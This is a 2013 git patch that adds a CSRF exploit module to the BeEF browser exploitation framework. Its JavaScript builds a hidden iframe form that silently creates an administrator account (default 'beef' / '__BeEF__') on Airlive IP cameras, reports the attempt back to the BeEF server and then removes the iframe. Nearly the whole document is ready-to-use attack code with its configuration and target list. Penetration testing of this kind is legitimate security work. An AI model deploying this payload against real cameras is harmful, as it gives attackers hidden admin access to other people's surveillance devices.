From d40486c391aa4c9858a88050da51446cfd11a0df Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 14 Jun 2013 15:28:35 +0930
Subject: [PATCH] Add airlive_ip_camera_csrf module

---
 .../camera/airlive_ip_camera_csrf/command.js  | 30 +++++++++++++++++++
 .../camera/airlive_ip_camera_csrf/config.yaml | 18 +++++++++++
 .../camera/airlive_ip_camera_csrf/module.rb   | 20 +++++++++++++
 3 files changed, 68 insertions(+)
 create mode 100644 modules/exploits/camera/airlive_ip_camera_csrf/command.js
 create mode 100644 modules/exploits/camera/airlive_ip_camera_csrf/config.yaml
 create mode 100644 modules/exploits/camera/airlive_ip_camera_csrf/module.rb

diff --git a/modules/exploits/camera/airlive_ip_camera_csrf/command.js b/modules/exploits/camera/airlive_ip_camera_csrf/command.js
new file mode 100644
index 000000000..b4bb27d9e
--- /dev/null
+++ b/modules/exploits/camera/airlive_ip_camera_csrf/command.js
@@ -0,0 +1,30 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var base  = '<%= @base %>'; 
+  var path  = 'cgi-bin/admin/usrgrp.cgi';
+  var user  = '<%= @user %>';
+  var pass  = '<%= @pass %>';
+
+  var airlive_ip_camera_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(base + path, "GET",
+    [{'type':'hidden', 'name':'user',     'value':user},
+     {'type':'hidden', 'name':'pwd',      'value':pass},
+     {'type':'hidden', 'name':'grp',      'value':'administrator'},
+     {'type':'hidden', 'name':'sgrp',     'value':'ptz'},
+     {'type':'hidden', 'name':'action',   'value':'add'},
+     {'type':'hidden', 'name':'redirect', 'value':''}
+    ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(airlive_ip_camera_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/camera/airlive_ip_camera_csrf/config.yaml b/modules/exploits/camera/airlive_ip_camera_csrf/config.yaml
new file mode 100644
index 000000000..05c6fd00a
--- /dev/null
+++ b/modules/exploits/camera/airlive_ip_camera_csrf/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# For more information see:
+# http://www.exploit-db.com/exploits/26174/
+##
+beef:
+    module:
+        airlive_add_user_csrf:
+            enable: true
+            category: ["Exploits", "Camera"]
+            name: "Airlive Add User CSRF"
+            description: "Attempts to add an admin user on a Airlive camera.<br/><br/>This CSRF is reported to work on the following models: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.</br/><br/>Note: This module has not been tested on a real device."
+            authors: ["bcoles", "Eliezer Varadé Lopez", "Javier Repiso Sánchez", "Jonás Ropero Castillo"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/camera/airlive_ip_camera_csrf/module.rb b/modules/exploits/camera/airlive_ip_camera_csrf/module.rb
new file mode 100644
index 000000000..22463ca92
--- /dev/null
+++ b/modules/exploits/camera/airlive_ip_camera_csrf/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Airlive_add_user_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root',  'value' => 'http://192.168.0.1/'},
+			{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef'},
+			{'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end